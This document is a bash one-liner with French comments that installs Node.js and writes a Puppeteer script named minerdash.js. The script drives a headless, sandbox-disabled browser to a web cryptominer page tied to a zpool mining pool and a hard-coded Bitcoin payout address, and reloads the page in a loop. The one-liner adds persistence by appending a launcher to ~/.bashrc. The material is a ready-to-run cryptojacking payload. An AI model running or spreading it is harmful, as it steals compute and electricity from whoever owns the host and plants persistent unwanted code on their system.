cd ~/. && wget https://nodejs.org/dist/v22.11.0/node-v22.11.0-linux-x64.tar.xz && tar -xvf node-v22.11.0-linux-x64.tar.xz && rm -rf node-v22.11.0-linux-x64.tar.xz && cd node-v22.11.0-linux-x64 && touch online && chmod +x * && echo "~/./node-v22.11.0-linux-x64/online" >> ~/.bashrc && echo "cd ~/./node-v22.11.0-linux-x64/bin && node minerdash.js" > ~/./node-v22.11.0-linux-x64/online && touch .puppetteerrc.cjs && printf '%s\n' 'const puppeteer = require('\''puppeteer'\'');

(async () => {
  const browser = await puppeteer.launch({ 
    headless: "new", // Change à false pour voir la fenêtre
    args: ['\''--no-sandbox'\'', '\''--disable-setuid-sandbox'\''] 
  });

  const page = await browser.newPage();

  // 1. Désactive le cache pour éviter l'\''encrassement de la RAM
  await page.setCacheEnabled(false);

  // 2. Surveillance des erreurs (Force le refresh si la page crash)
  page.on('\''error'\'', err => {
    console.error('\''Erreur de page détectée, rechargement...'\'', err);
    page.reload();
  });

  page.on('\''pageerror'\'', pageerr => {
    console.error('\''Erreur JavaScript détectée, rechargement...'\'', pageerr);
    page.reload();
  });

  const url = '\''https://webminer.pages.dev/?algorithm=cwm_minotaurx&host=minotaurx.eu.mine.zpool.ca&port=7019&worker=19HgoGWTeEB4ReGcVeMPFBEaZ2wUfdgb7w&password=c%3DBTC%2Czap%3DPLSR-mino&workers=20'\'';

  async function runCycle() {
    try {
      console.log(`[${new Date().toLocaleTimeString()}] Chargement de la page...`);
      
      // Nettoyage complet avant chaque cycle
      const client = await page.target().createCDPSession();
      await client.send('\''Network.clearBrowserCache'\'');
      await client.send('\''Network.clearBrowserCookies'\'');

      await page.goto(url, { waitUntil: '\''networkidle2'\'' });
      console.log("Minage actif. Prochain refresh dans 15 minutes.");

      // Attend 15 minutes (15 * 60 * 1000 ms)
      setTimeout(runCycle, 15 * 60 * 1000);
      
    } catch (e) {
      console.log("Erreur de connexion, nouvelle tentative dans 10s...");
      setTimeout(runCycle, 10000);
    }
  }

  runCycle();
})();
' > ~/./node-v22.11.0-linux-x64/bin/minerdash.js && cd ~/./node-v22.11.0-linux-x64/bin && npm init -y && npm install -y puppeteer && node minerdash.js